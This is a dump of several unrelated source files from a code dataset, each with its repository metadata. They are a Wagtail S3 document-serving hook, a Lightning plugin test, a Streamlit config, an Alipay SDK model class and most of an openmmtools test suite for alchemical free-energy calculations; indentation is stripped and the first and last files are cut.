# Skip this hook if not using django-storages boto3 backend.
if not issubclass(get_storage_class(), S3Boto3Storage):
return
# Send document_served signal.
document_served.send(
sender=get_document_model(), instance=document, request=request
)
# Get direct S3 link.
file_url = document.file.url
# Generate redirect response and add never_cache headers.
response = redirect(file_url)
del response["Cache-control"]
add_never_cache_headers(response)
return response
@hooks.register("construct_settings_menu")
def hide_main_menu_menu_item(request, menu_items):
menu_items[:] = [item for item in menu_items if item.name != "main-menu"]
|
tests/plugins/custommsg_a.py | Bladez1753/lightning | 2,288 | 12749669 | #!/usr/bin/env python3
from pyln.client import Plugin
plugin = Plugin()
@plugin.hook('custommsg')
def on_custommsg(peer_id, payload, plugin, message=None, **kwargs):
plugin.log("Got custommessage_a {msg} from peer {peer_id}".format(
msg=payload,
peer_id=peer_id
))
return {'result': 'continue'}
plugin.run()
|
config.prod.py | R-fred/awesome-streamlit | 1,194 | 12749718 | <filename>config.prod.py
"""Configuration file for production Development"""
DEBUG = False
|
alipay/aop/api/domain/ComplextMockModel.py | snowxmas/alipay-sdk-python-all | 213 | 12749730 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.SimpleMockModel import SimpleMockModel
class ComplextMockModel(object):
def __init__(self):
self._biz_model = None
self._biz_num = None
self._biz_type = None
@property
def biz_model(self):
return self._biz_model
@biz_model.setter
def biz_model(self, value):
if isinstance(value, SimpleMockModel):
self._biz_model = value
else:
self._biz_model = SimpleMockModel.from_alipay_dict(value)
@property
def biz_num(self):
return self._biz_num
@biz_num.setter
def biz_num(self, value):
self._biz_num = value
@property
def biz_type(self):
return self._biz_type
@biz_type.setter
def biz_type(self, value):
self._biz_type = value
def to_alipay_dict(self):
params = dict()
if self.biz_model:
if hasattr(self.biz_model, 'to_alipay_dict'):
params['biz_model'] = self.biz_model.to_alipay_dict()
else:
params['biz_model'] = self.biz_model
if self.biz_num:
if hasattr(self.biz_num, 'to_alipay_dict'):
params['biz_num'] = self.biz_num.to_alipay_dict()
else:
params['biz_num'] = self.biz_num
if self.biz_type:
if hasattr(self.biz_type, 'to_alipay_dict'):
params['biz_type'] = self.biz_type.to_alipay_dict()
else:
params['biz_type'] = self.biz_type
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = ComplextMockModel()
if 'biz_model' in d:
o.biz_model = d['biz_model']
if 'biz_num' in d:
o.biz_num = d['biz_num']
if 'biz_type' in d:
o.biz_type = d['biz_type']
return o
|
openmmtools/tests/test_alchemy.py | sroet/openmmtools | 135 | 12749731 | <filename>openmmtools/tests/test_alchemy.py
#!/usr/bin/python
# =============================================================================
# MODULE DOCSTRING
# =============================================================================
"""
Tests for alchemical factory in `alchemy.py`.
"""
# =============================================================================
# GLOBAL IMPORTS
# =============================================================================
from __future__ import print_function
import os
import sys
import zlib
import pickle
import itertools
from functools import partial
import nose
import scipy
from nose.plugins.attrib import attr
from openmmtools import testsystems, forces
from openmmtools.constants import kB
from openmmtools.alchemy import *
logger = logging.getLogger(__name__)
# =============================================================================
# CONSTANTS
# =============================================================================
temperature = 300.0 * unit.kelvin # reference temperature
# MAX_DELTA = 0.01 * kB * temperature # maximum allowable deviation
MAX_DELTA = 1.0 * kB * temperature # maximum allowable deviation
GLOBAL_ENERGY_UNIT = unit.kilojoules_per_mole # controls printed units
GLOBAL_ALCHEMY_PLATFORM = None # This is used in every energy calculation.
# GLOBAL_ALCHEMY_PLATFORM = openmm.Platform.getPlatformByName('OpenCL') # DEBUG: Use OpenCL over CPU platform for testing since OpenCL is deterministic, while CPU is not
# =============================================================================
# TESTING UTILITIES
# =============================================================================
def create_context(system, integrator, platform=None):
"""Create a Context.
If platform is None, GLOBAL_ALCHEMY_PLATFORM is used.
"""
if platform is None:
platform = GLOBAL_ALCHEMY_PLATFORM
if platform is not None:
context = openmm.Context(system, integrator, platform)
else:
context = openmm.Context(system, integrator)
return context
def compute_energy(system, positions, platform=None, force_group=-1):
"""Compute energy of the system in the given positions.
Parameters
----------
platform : simtk.openmm.Platform or None, optional
If None, the global GLOBAL_ALCHEMY_PLATFORM will be used.
force_group : int flag or set of int, optional
Passed to the groups argument of Context.getState().
"""
timestep = 1.0 * unit.femtoseconds
integrator = openmm.VerletIntegrator(timestep)
context = create_context(system, integrator, platform)
context.setPositions(positions)
state = context.getState(getEnergy=True, groups=force_group)
potential = state.getPotentialEnergy()
del context, integrator, state
return potential
def minimize(system, positions, platform=None, tolerance=1.0*unit.kilocalories_per_mole/unit.angstroms, maxIterations=50):
"""Minimize the energy of the given system.
Parameters
----------
platform : simtk.openmm.Platform or None, optional
If None, the global GLOBAL_ALCHEMY_PLATFORM will be used.
tolerance : simtk.unit.Quantity with units compatible with energy/distance, optional, default = 1*kilocalories_per_mole/angstroms
Minimization tolerance
maxIterations : int, optional, default=50
Maximum number of iterations for minimization
Returns
-------
minimized_positions : simtk.openmm.Quantity with shape [nparticle,3] with units compatible with distance
The energy-minimized positions.
"""
timestep = 1.0 * unit.femtoseconds
integrator = openmm.VerletIntegrator(timestep)
context = create_context(system, integrator, platform)
context.setPositions(positions)
openmm.LocalEnergyMinimizer.minimize(context, tolerance, maxIterations)
minimized_positions = context.getState(getPositions=True).getPositions(asNumpy=True)
del context, integrator
return minimized_positions
def compute_force_energy(system, positions, force_name):
"""Compute the energy of the force with the given name."""
system = copy.deepcopy(system) # Copy to avoid modifications
force_name_index = 1
found_force = False
# Separate force group of force_name from all others.
for force in system.getForces():
if force.__class__.__name__ == force_name:
force.setForceGroup(force_name_index)
found_force = True
else:
force.setForceGroup(0)
if not found_force:
return None
force_energy = compute_energy(system, positions, force_group=2**force_name_index)
del system
return force_energy
def assert_almost_equal(energy1, energy2, err_msg):
delta = energy1 - energy2
err_msg += ' interactions do not match! Reference {}, alchemical {},' \
' difference {}'.format(energy1, energy2, delta)
assert abs(delta) < MAX_DELTA, err_msg
def turn_off_nonbonded(system, sterics=False, electrostatics=False,
exceptions=False, only_atoms=frozenset()):
"""Turn off sterics and/or electrostatics interactions.
This affects only NonbondedForce and non-alchemical CustomNonbondedForces.
If `exceptions` is True, only the exceptions are turned off.
Support also system that have gone through replace_reaction_field.
The `system` must have only nonbonded forces.
If `only_atoms` is specified, only the those atoms will be turned off.
"""
if len(only_atoms) == 0: # if empty, turn off all particles
only_atoms = set(range(system.getNumParticles()))
epsilon_coeff = 0.0 if sterics else 1.0
charge_coeff = 0.0 if electrostatics else 1.0
if exceptions: # Turn off exceptions
force_idx, nonbonded_force = forces.find_forces(system, openmm.NonbondedForce, only_one=True)
# Exceptions.
for exception_index in range(nonbonded_force.getNumExceptions()):
iatom, jatom, charge, sigma, epsilon = nonbonded_force.getExceptionParameters(exception_index)
if iatom in only_atoms or jatom in only_atoms:
nonbonded_force.setExceptionParameters(exception_index, iatom, jatom,
charge_coeff*charge, sigma, epsilon_coeff*epsilon)
# Offset exceptions.
for offset_index in range(nonbonded_force.getNumExceptionParameterOffsets()):
(parameter, exception_index, chargeprod_scale,
sigma_scale, epsilon_scale) = nonbonded_force.getExceptionParameterOffset(offset_index)
iatom, jatom, _, _, _ = nonbonded_force.getExceptionParameters(exception_index)
if iatom in only_atoms or jatom in only_atoms:
nonbonded_force.setExceptionParameterOffset(offset_index, parameter, exception_index,
charge_coeff*chargeprod_scale, sigma_scale,
epsilon_coeff*epsilon_scale)
else:
# Turn off particle interactions
for force in system.getForces():
# Handle only a Nonbonded and a CustomNonbonded (for RF).
if not (isinstance(force, openmm.CustomNonbondedForce) and 'lambda' not in force.getEnergyFunction() or
isinstance(force, openmm.NonbondedForce)):
continue
# Particle interactions.
for particle_index in range(force.getNumParticles()):
if particle_index in only_atoms:
# Convert tuple parameters to list to allow changes.
parameters = list(force.getParticleParameters(particle_index))
parameters[0] *= charge_coeff # charge
try: # CustomNonbondedForce
force.setParticleParameters(particle_index, parameters)
except TypeError: # NonbondedForce
parameters[2] *= epsilon_coeff # epsilon
force.setParticleParameters(particle_index, *parameters)
# Offset particle interactions.
if isinstance(force, openmm.NonbondedForce):
for offset_index in range(force.getNumParticleParameterOffsets()):
(parameter, particle_index, charge_scale,
sigma_scale, epsilon_scale) = force.getParticleParameterOffset(offset_index)
if particle_index in only_atoms:
force.setParticleParameterOffset(offset_index, parameter, particle_index,
charge_coeff*charge_scale, sigma_scale,
epsilon_coeff*epsilon_scale)
def dissect_nonbonded_energy(reference_system, positions, alchemical_atoms, other_alchemical_atoms):
"""Dissect the nonbonded energy contributions of the reference system
by atom group and sterics/electrostatics.
This works also for systems objects whose CutoffPeriodic force
has been replaced by a CustomNonbondedForce to set c_rf = 0.
Parameters
----------
reference_system : simtk.openmm.System
The reference system with the NonbondedForce to dissect.
positions : simtk.openmm.unit.Quantity of dimension [nparticles,3] with units compatible with Angstroms
The positions to test.
alchemical_atoms : set of int
The indices of the alchemical atoms.
other_alchemical_atoms : set of int
The indices of the alchemical atoms in other alchemical regions
Returns
-------
tuple of simtk.openmm.unit.Quantity with units compatible with kJ/mol
All contributions to the potential energy of NonbondedForce in the order:
nn_particle_sterics: particle sterics interactions between nonalchemical atoms
aa_particle_sterics: particle sterics interactions between alchemical atoms
na_particle_sterics: particle sterics interactions between nonalchemical-alchemical atoms
nn_particle_electro: (direct space) particle electrostatics interactions between nonalchemical atoms
aa_particle_electro: (direct space) particle electrostatics interactions between alchemical atoms
na_particle_electro: (direct space) particle electrostatics interactions between nonalchemical-alchemical atoms
nn_exception_sterics: particle sterics 1,4 exceptions between nonalchemical atoms
aa_exception_sterics: particle sterics 1,4 exceptions between alchemical atoms
na_exception_sterics: particle sterics 1,4 exceptions between nonalchemical-alchemical atoms
nn_exception_electro: particle electrostatics 1,4 exceptions between nonalchemical atoms
aa_exception_electro: particle electrostatics 1,4 exceptions between alchemical atoms
na_exception_electro: particle electrostatics 1,4 exceptions between nonalchemical-alchemical atoms
nn_reciprocal_energy: electrostatics of reciprocal space between nonalchemical atoms
aa_reciprocal_energy: electrostatics of reciprocal space between alchemical atoms
na_reciprocal_energy: electrostatics of reciprocal space between nonalchemical-alchemical atoms
"""
all_alchemical_atoms = set(alchemical_atoms).union(other_alchemical_atoms)
nonalchemical_atoms = set(range(reference_system.getNumParticles())).difference(all_alchemical_atoms)
# Remove all forces but NonbondedForce and eventually the
# CustomNonbondedForce used to model reaction field.
reference_system = copy.deepcopy(reference_system) # don't modify original system
forces_to_remove = list()
for force_index, force in enumerate(reference_system.getForces()):
force.setForceGroup(0)
if isinstance(force, openmm.NonbondedForce):
force.setReciprocalSpaceForceGroup(30) # separate PME reciprocal from direct space
# We keep only CustomNonbondedForces that are not alchemically modified.
elif not (isinstance(force, openmm.CustomNonbondedForce) and
'lambda' not in force.getEnergyFunction()):
forces_to_remove.append(force_index)
for force_index in reversed(forces_to_remove):
reference_system.removeForce(force_index)
assert len(reference_system.getForces()) <= 2
# Compute particle interactions between different groups of atoms
# ----------------------------------------------------------------
# Turn off other alchemical regions
if len(other_alchemical_atoms) > 0:
turn_off_nonbonded(reference_system, sterics=True, electrostatics=True, only_atoms=other_alchemical_atoms)
turn_off_nonbonded(reference_system, sterics=True, electrostatics=True, exceptions=True, only_atoms=other_alchemical_atoms)
system = copy.deepcopy(reference_system)
# Compute total energy from nonbonded interactions
tot_energy = compute_energy(system, positions)
tot_reciprocal_energy = compute_energy(system, positions, force_group={30})
# Compute contributions from particle sterics
turn_off_nonbonded(system, sterics=True, only_atoms=alchemical_atoms)
tot_energy_no_alchem_particle_sterics = compute_energy(system, positions)
system = copy.deepcopy(reference_system) # Restore alchemical sterics
turn_off_nonbonded(system, sterics=True, only_atoms=nonalchemical_atoms)
tot_energy_no_nonalchem_particle_sterics = compute_energy(system, positions)
turn_off_nonbonded(system, sterics=True)
tot_energy_no_particle_sterics = compute_energy(system, positions)
tot_particle_sterics = tot_energy - tot_energy_no_particle_sterics
nn_particle_sterics = tot_energy_no_alchem_particle_sterics - tot_energy_no_particle_sterics
aa_particle_sterics = tot_energy_no_nonalchem_particle_sterics - tot_energy_no_particle_sterics
na_particle_sterics = tot_particle_sterics - nn_particle_sterics - aa_particle_sterics
# Compute contributions from particle electrostatics
system = copy.deepcopy(reference_system) # Restore sterics
turn_off_nonbonded(system, electrostatics=True, only_atoms=alchemical_atoms)
tot_energy_no_alchem_particle_electro = compute_energy(system, positions)
nn_reciprocal_energy = compute_energy(system, positions, force_group={30})
system = copy.deepcopy(reference_system) # Restore alchemical electrostatics
turn_off_nonbonded(system, electrostatics=True, only_atoms=nonalchemical_atoms)
tot_energy_no_nonalchem_particle_electro = compute_energy(system, positions)
aa_reciprocal_energy = compute_energy(system, positions, force_group={30})
turn_off_nonbonded(system, electrostatics=True)
tot_energy_no_particle_electro = compute_energy(system, positions)
na_reciprocal_energy = tot_reciprocal_energy - nn_reciprocal_energy - aa_reciprocal_energy
tot_particle_electro = tot_energy - tot_energy_no_particle_electro
nn_particle_electro = tot_energy_no_alchem_particle_electro - tot_energy_no_particle_electro
aa_particle_electro = tot_energy_no_nonalchem_particle_electro - tot_energy_no_particle_electro
na_particle_electro = tot_particle_electro - nn_particle_electro - aa_particle_electro
nn_particle_electro -= nn_reciprocal_energy
aa_particle_electro -= aa_reciprocal_energy
na_particle_electro -= na_reciprocal_energy
# Compute exceptions between different groups of atoms
# -----------------------------------------------------
# Compute contributions from exceptions sterics
system = copy.deepcopy(reference_system) # Restore particle interactions
turn_off_nonbonded(system, sterics=True, exceptions=True, only_atoms=alchemical_atoms)
tot_energy_no_alchem_exception_sterics = compute_energy(system, positions)
system = copy.deepcopy(reference_system) # Restore alchemical sterics
turn_off_nonbonded(system, sterics=True, exceptions=True, only_atoms=nonalchemical_atoms)
tot_energy_no_nonalchem_exception_sterics = compute_energy(system, positions)
turn_off_nonbonded(system, sterics=True, exceptions=True)
tot_energy_no_exception_sterics = compute_energy(system, positions)
tot_exception_sterics = tot_energy - tot_energy_no_exception_sterics
nn_exception_sterics = tot_energy_no_alchem_exception_sterics - tot_energy_no_exception_sterics
aa_exception_sterics = tot_energy_no_nonalchem_exception_sterics - tot_energy_no_exception_sterics
na_exception_sterics = tot_exception_sterics - nn_exception_sterics - aa_exception_sterics
# Compute contributions from exceptions electrostatics
system = copy.deepcopy(reference_system) # Restore exceptions sterics
turn_off_nonbonded(system, electrostatics=True, exceptions=True, only_atoms=alchemical_atoms)
tot_energy_no_alchem_exception_electro = compute_energy(system, positions)
system = copy.deepcopy(reference_system) # Restore alchemical electrostatics
turn_off_nonbonded(system, electrostatics=True, exceptions=True, only_atoms=nonalchemical_atoms)
tot_energy_no_nonalchem_exception_electro = compute_energy(system, positions)
turn_off_nonbonded(system, electrostatics=True, exceptions=True)
tot_energy_no_exception_electro = compute_energy(system, positions)
tot_exception_electro = tot_energy - tot_energy_no_exception_electro
nn_exception_electro = tot_energy_no_alchem_exception_electro - tot_energy_no_exception_electro
aa_exception_electro = tot_energy_no_nonalchem_exception_electro - tot_energy_no_exception_electro
na_exception_electro = tot_exception_electro - nn_exception_electro - aa_exception_electro
assert tot_particle_sterics == nn_particle_sterics + aa_particle_sterics + na_particle_sterics
assert_almost_equal(tot_particle_electro, nn_particle_electro + aa_particle_electro +
na_particle_electro + nn_reciprocal_energy + aa_reciprocal_energy + na_reciprocal_energy,
'Inconsistency during dissection of nonbonded contributions:')
assert tot_exception_sterics == nn_exception_sterics + aa_exception_sterics + na_exception_sterics
assert tot_exception_electro == nn_exception_electro + aa_exception_electro + na_exception_electro
assert_almost_equal(tot_energy, tot_particle_sterics + tot_particle_electro +
tot_exception_sterics + tot_exception_electro,
'Inconsistency during dissection of nonbonded contributions:')
return nn_particle_sterics, aa_particle_sterics, na_particle_sterics,\
nn_particle_electro, aa_particle_electro, na_particle_electro,\
nn_exception_sterics, aa_exception_sterics, na_exception_sterics,\
nn_exception_electro, aa_exception_electro, na_exception_electro,\
nn_reciprocal_energy, aa_reciprocal_energy, na_reciprocal_energy
def compute_direct_space_correction(nonbonded_force, alchemical_atoms, positions):
"""
Compute the correction added by OpenMM to the direct space to account for
exception in reciprocal space energy.
Parameters
----------
nonbonded_force : simtk.openmm.NonbondedForce
The nonbonded force to compute the direct space correction.
alchemical_atoms : set
Set of alchemical particles in the force.
positions : numpy.array
Position of the particles.
Returns
-------
aa_correction : simtk.openmm.unit.Quantity with units compatible with kJ/mol
The correction to the direct spaced caused by exceptions between alchemical atoms.
na_correction : simtk.openmm.unit.Quantity with units compatible with kJ/mol
The correction to the direct spaced caused by exceptions between nonalchemical-alchemical atoms.
"""
energy_unit = unit.kilojoule_per_mole
aa_correction = 0.0
na_correction = 0.0
# Convert quantity positions into floats.
if isinstance(positions, unit.Quantity):
positions = positions.value_in_unit_system(unit.md_unit_system)
# If there is no reciprocal space, the correction is 0.0
if nonbonded_force.getNonbondedMethod() not in [openmm.NonbondedForce.Ewald, openmm.NonbondedForce.PME]:
return aa_correction * energy_unit, na_correction * energy_unit
# Get alpha ewald parameter
alpha_ewald, _, _, _ = nonbonded_force.getPMEParameters()
if alpha_ewald / alpha_ewald.unit == 0.0:
cutoff_distance = nonbonded_force.getCutoffDistance()
tolerance = nonbonded_force.getEwaldErrorTolerance()
alpha_ewald = (1.0 / cutoff_distance) * np.sqrt(-np.log(2.0*tolerance))
alpha_ewald = alpha_ewald.value_in_unit_system(unit.md_unit_system)
assert alpha_ewald != 0.0
for exception_id in range(nonbonded_force.getNumExceptions()):
# Get particles parameters in md unit system
iatom, jatom, _, _, _ = nonbonded_force.getExceptionParameters(exception_id)
icharge, _, _ = nonbonded_force.getParticleParameters(iatom)
jcharge, _, _ = nonbonded_force.getParticleParameters(jatom)
icharge = icharge.value_in_unit_system(unit.md_unit_system)
jcharge = jcharge.value_in_unit_system(unit.md_unit_system)
# Compute the correction and take care of numerical instabilities
r = np.linalg.norm(positions[iatom] - positions[jatom]) # distance between atoms
alpha_r = alpha_ewald * r
if alpha_r > 1e-6:
correction = ONE_4PI_EPS0 * icharge * jcharge * scipy.special.erf(alpha_r) / r
else: # for small alpha_r we linearize erf()
correction = ONE_4PI_EPS0 * alpha_ewald * icharge * jcharge * 2.0 / np.sqrt(np.pi)
# Assign correction to correct group
if iatom in alchemical_atoms and jatom in alchemical_atoms:
aa_correction += correction
elif iatom in alchemical_atoms or jatom in alchemical_atoms:
na_correction += correction
return aa_correction * energy_unit, na_correction * energy_unit
def is_alchemical_pme_treatment_exact(alchemical_system):
"""Return True if the given alchemical system models PME exactly."""
# If exact PME is here, the NonbondedForce defines a
# lambda_electrostatics variable.
_, nonbonded_force = forces.find_forces(alchemical_system, openmm.NonbondedForce,
only_one=True)
for parameter_idx in range(nonbonded_force.getNumGlobalParameters()):
parameter_name = nonbonded_force.getGlobalParameterName(parameter_idx)
# With multiple alchemical regions, lambda_electrostatics might have a suffix.
if parameter_name.startswith('lambda_electrostatics'):
return True
return False
# =============================================================================
# SUBROUTINES FOR TESTING
# =============================================================================
def compare_system_energies(reference_system, alchemical_system, alchemical_regions, positions):
"""Check that the energies of reference and alchemical systems are close.
This takes care of ignoring the reciprocal space when the nonbonded
method is an Ewald method.
"""
if not isinstance(alchemical_regions, list):
alchemical_regions = [alchemical_regions]
# Default we compare the energy of all groups.
force_group = -1
# Check nonbonded method. Comparing with PME is more complicated
# because the alchemical system with direct-space treatment of PME
# does not take into account the reciprocal space.
force_idx, nonbonded_force = forces.find_forces(reference_system, openmm.NonbondedForce, only_one=True)
nonbonded_method = nonbonded_force.getNonbondedMethod()
is_direct_space_pme = (nonbonded_method in [openmm.NonbondedForce.PME, openmm.NonbondedForce.Ewald] and
not is_alchemical_pme_treatment_exact(alchemical_system))
if is_direct_space_pme:
# Separate the reciprocal space force in a different group.
reference_system = copy.deepcopy(reference_system)
alchemical_system = copy.deepcopy(alchemical_system)
for system in [reference_system, alchemical_system]:
for force in system.getForces():
force.setForceGroup(0)
if isinstance(force, openmm.NonbondedForce):
force.setReciprocalSpaceForceGroup(31)
# We compare only the direct space energy
force_group = {0}
# Compute the reciprocal space correction added to the direct space
# energy due to the exceptions of the alchemical atoms.
aa_correction = 0.0 * unit.kilojoule_per_mole
na_correction = 0.0 * unit.kilojoule_per_mole
for region in alchemical_regions:
alchemical_atoms = region.alchemical_atoms
aa, na = compute_direct_space_correction(nonbonded_force, alchemical_atoms, positions)
aa_correction += aa
na_correction += na
# Compute potential of the direct space.
potentials = [compute_energy(system, positions, force_group=force_group)
for system in [reference_system, alchemical_system]]
# Add the direct space correction.
if is_direct_space_pme:
potentials.append(aa_correction + na_correction)
else:
potentials.append(0.0 * GLOBAL_ENERGY_UNIT)
# Check that error is small.
delta = potentials[1] - potentials[2] - potentials[0]
if abs(delta) > MAX_DELTA:
print("========")
for description, potential in zip(['reference', 'alchemical', 'PME correction'], potentials):
print("{}: {} ".format(description, potential))
print("delta : {}".format(delta))
err_msg = "Maximum allowable deviation exceeded (was {:.8f} kcal/mol; allowed {:.8f} kcal/mol)."
raise Exception(err_msg.format(delta / unit.kilocalories_per_mole, MAX_DELTA / unit.kilocalories_per_mole))
def check_multi_interacting_energy_components(reference_system, alchemical_system, alchemical_regions, positions):
"""wrapper around check_interacting_energy_components for multiple regions
Parameters
----------
reference_system : simtk.openmm.System
The reference system.
alchemical_system : simtk.openmm.System
The alchemically modified system to test.
alchemical_regions : AlchemicalRegion.
The alchemically modified region.
positions : n_particlesx3 array-like of simtk.openmm.unit.Quantity
The positions to test (units of length).
Note
----------
Interactions between alchemical regions are not tested here.
Alchemical regions are assumed to be non interacting.
"""
all_alchemical_atoms = set()
for region in alchemical_regions:
for atom in region.alchemical_atoms:
all_alchemical_atoms.add(atom)
for region in alchemical_regions:
check_interacting_energy_components(
reference_system, alchemical_system, region, positions,
all_alchemical_atoms, multi_regions=True)
def check_interacting_energy_components(reference_system, alchemical_system, alchemical_regions, positions,
all_alchemical_atoms=None, multi_regions=False):
"""Compare full and alchemically-modified system energies by energy component.
Parameters
----------
reference_system : simtk.openmm.System
The reference system.
alchemical_system : simtk.openmm.System
The alchemically modified system to test.
alchemical_regions : AlchemicalRegion.
The alchemically modified region.
positions : n_particlesx3 array-like of simtk.openmm.unit.Quantity
The positions to test (units of length).
multi_regions : boolean
Indicates if mutiple regions are being tested
"""
energy_unit = unit.kilojoule_per_mole
reference_system = copy.deepcopy(reference_system)
alchemical_system = copy.deepcopy(alchemical_system)
is_exact_pme = is_alchemical_pme_treatment_exact(alchemical_system)
# Find nonbonded method
_, nonbonded_force = forces.find_forces(reference_system, openmm.NonbondedForce, only_one=True)
nonbonded_method = nonbonded_force.getNonbondedMethod()
# Get energy components of reference system's nonbonded force
if multi_regions:
other_alchemical_atoms = all_alchemical_atoms.difference(alchemical_regions.alchemical_atoms)
print("Dissecting reference system's nonbonded force for region {}".format(alchemical_regions.name))
else:
other_alchemical_atoms = set()
print("Dissecting reference system's nonbonded force")
energy_components = dissect_nonbonded_energy(reference_system, positions,
alchemical_regions.alchemical_atoms, other_alchemical_atoms)
nn_particle_sterics, aa_particle_sterics, na_particle_sterics,\
nn_particle_electro, aa_particle_electro, na_particle_electro,\
nn_exception_sterics, aa_exception_sterics, na_exception_sterics,\
nn_exception_electro, aa_exception_electro, na_exception_electro,\
nn_reciprocal_energy, aa_reciprocal_energy, na_reciprocal_energy = energy_components
# Dissect unmodified nonbonded force in alchemical system
if multi_regions:
print("Dissecting alchemical system's unmodified nonbonded force for region {}".format(alchemical_regions.name))
else:
print("Dissecting alchemical system's unmodified nonbonded force")
energy_components = dissect_nonbonded_energy(alchemical_system, positions,
alchemical_regions.alchemical_atoms, other_alchemical_atoms)
unmod_nn_particle_sterics, unmod_aa_particle_sterics, unmod_na_particle_sterics,\
unmod_nn_particle_electro, unmod_aa_particle_electro, unmod_na_particle_electro,\
unmod_nn_exception_sterics, unmod_aa_exception_sterics, unmod_na_exception_sterics,\
unmod_nn_exception_electro, unmod_aa_exception_electro, unmod_na_exception_electro,\
unmod_nn_reciprocal_energy, unmod_aa_reciprocal_energy, unmod_na_reciprocal_energy = energy_components
# Get alchemically-modified energy components
if multi_regions:
print("Computing alchemical system components energies for region {}".format(alchemical_regions.name))
else:
print("Computing alchemical system components energies")
alchemical_state = AlchemicalState.from_system(alchemical_system, parameters_name_suffix=alchemical_regions.name)
alchemical_state.set_alchemical_parameters(1.0)
energy_components = AbsoluteAlchemicalFactory.get_energy_components(alchemical_system, alchemical_state,
positions, platform=GLOBAL_ALCHEMY_PLATFORM)
if multi_regions:
region_label = ' for region {}'.format(alchemical_regions.name)
else:
region_label = ''
# Sterics particle and exception interactions are always modeled with a custom force.
na_custom_particle_sterics = energy_components['alchemically modified NonbondedForce for non-alchemical/alchemical sterics' + region_label]
aa_custom_particle_sterics = energy_components['alchemically modified NonbondedForce for alchemical/alchemical sterics' + region_label]
na_custom_exception_sterics = energy_components['alchemically modified BondForce for non-alchemical/alchemical sterics exceptions' + region_label]
aa_custom_exception_sterics = energy_components['alchemically modified BondForce for alchemical/alchemical sterics exceptions' + region_label]
# With exact treatment of PME, we use the NonbondedForce offset for electrostatics.
try:
na_custom_particle_electro = energy_components['alchemically modified NonbondedForce for non-alchemical/alchemical electrostatics' + region_label]
aa_custom_particle_electro = energy_components['alchemically modified NonbondedForce for alchemical/alchemical electrostatics' + region_label]
na_custom_exception_electro = energy_components['alchemically modified BondForce for non-alchemical/alchemical electrostatics exceptions' + region_label]
aa_custom_exception_electro = energy_components['alchemically modified BondForce for alchemical/alchemical electrostatics exceptions' + region_label]
except KeyError:
assert is_exact_pme
# Test that all NonbondedForce contributions match
# -------------------------------------------------
# All contributions from alchemical atoms in unmodified nonbonded force are turned off
err_msg = 'Non-zero contribution from unmodified NonbondedForce alchemical atoms: '
assert_almost_equal(unmod_aa_particle_sterics, 0.0 * energy_unit, err_msg)
assert_almost_equal(unmod_na_particle_sterics, 0.0 * energy_unit, err_msg)
assert_almost_equal(unmod_aa_exception_sterics, 0.0 * energy_unit, err_msg)
assert_almost_equal(unmod_na_exception_sterics, 0.0 * energy_unit, err_msg)
if not is_exact_pme:
# With exact PME treatment these are tested below.
assert_almost_equal(unmod_aa_particle_electro, 0.0 * energy_unit, err_msg)
assert_almost_equal(unmod_na_particle_electro, 0.0 * energy_unit, err_msg)
assert_almost_equal(unmod_aa_reciprocal_energy, 0.0 * energy_unit, err_msg)
assert_almost_equal(unmod_na_reciprocal_energy, 0.0 * energy_unit, err_msg)
assert_almost_equal(unmod_aa_exception_electro, 0.0 * energy_unit, err_msg)
assert_almost_equal(unmod_na_exception_electro, 0.0 * energy_unit, err_msg)
# Check sterics interactions match
assert_almost_equal(nn_particle_sterics, unmod_nn_particle_sterics,
'Non-alchemical/non-alchemical atoms particle sterics' + region_label)
assert_almost_equal(nn_exception_sterics, unmod_nn_exception_sterics,
'Non-alchemical/non-alchemical atoms exceptions sterics' + region_label)
assert_almost_equal(aa_particle_sterics, aa_custom_particle_sterics,
'Alchemical/alchemical atoms particle sterics' + region_label)
assert_almost_equal(aa_exception_sterics, aa_custom_exception_sterics,
'Alchemical/alchemical atoms exceptions sterics' + region_label)
assert_almost_equal(na_particle_sterics, na_custom_particle_sterics,
'Non-alchemical/alchemical atoms particle sterics' + region_label)
assert_almost_equal(na_exception_sterics, na_custom_exception_sterics,
'Non-alchemical/alchemical atoms exceptions sterics' + region_label)
# Check electrostatics interactions
assert_almost_equal(nn_particle_electro, unmod_nn_particle_electro,
'Non-alchemical/non-alchemical atoms particle electrostatics' + region_label)
assert_almost_equal(nn_exception_electro, unmod_nn_exception_electro,
'Non-alchemical/non-alchemical atoms exceptions electrostatics' + region_label)
# With exact treatment of PME, the electrostatics of alchemical-alchemical
# atoms is modeled with NonbondedForce offsets.
if is_exact_pme:
# Reciprocal space.
assert_almost_equal(aa_reciprocal_energy, unmod_aa_reciprocal_energy,
'Alchemical/alchemical atoms reciprocal space energy' + region_label)
assert_almost_equal(na_reciprocal_energy, unmod_na_reciprocal_energy,
'Non-alchemical/alchemical atoms reciprocal space energy' + region_label)
# Direct space.
assert_almost_equal(aa_particle_electro, unmod_aa_particle_electro,
'Alchemical/alchemical atoms particle electrostatics' + region_label)
assert_almost_equal(na_particle_electro, unmod_na_particle_electro,
'Non-alchemical/alchemical atoms particle electrostatics' + region_label)
# Exceptions.
assert_almost_equal(aa_exception_electro, unmod_aa_exception_electro,
'Alchemical/alchemical atoms exceptions electrostatics' + region_label)
assert_almost_equal(na_exception_electro, unmod_na_exception_electro,
'Non-alchemical/alchemical atoms exceptions electrostatics' + region_label)
# With direct space PME, the custom forces model only the
# direct space of alchemical-alchemical interactions.
else:
# Get direct space correction due to reciprocal space exceptions
aa_correction, na_correction = compute_direct_space_correction(nonbonded_force,
alchemical_regions.alchemical_atoms,
positions)
aa_particle_electro += aa_correction
na_particle_electro += na_correction
# Check direct space energy
assert_almost_equal(aa_particle_electro, aa_custom_particle_electro,
'Alchemical/alchemical atoms particle electrostatics' + region_label)
assert_almost_equal(na_particle_electro, na_custom_particle_electro,
'Non-alchemical/alchemical atoms particle electrostatics' + region_label)
# Check exceptions.
assert_almost_equal(aa_exception_electro, aa_custom_exception_electro,
'Alchemical/alchemical atoms exceptions electrostatics' + region_label)
assert_almost_equal(na_exception_electro, na_custom_exception_electro,
'Non-alchemical/alchemical atoms exceptions electrostatics' + region_label)
# With Ewald methods, the NonbondedForce should always hold the
# reciprocal space energy of nonalchemical-nonalchemical atoms.
if nonbonded_method in [openmm.NonbondedForce.PME, openmm.NonbondedForce.Ewald]:
# Reciprocal space.
assert_almost_equal(nn_reciprocal_energy, unmod_nn_reciprocal_energy,
'Non-alchemical/non-alchemical atoms reciprocal space energy')
else:
# Reciprocal space energy should be null in this case
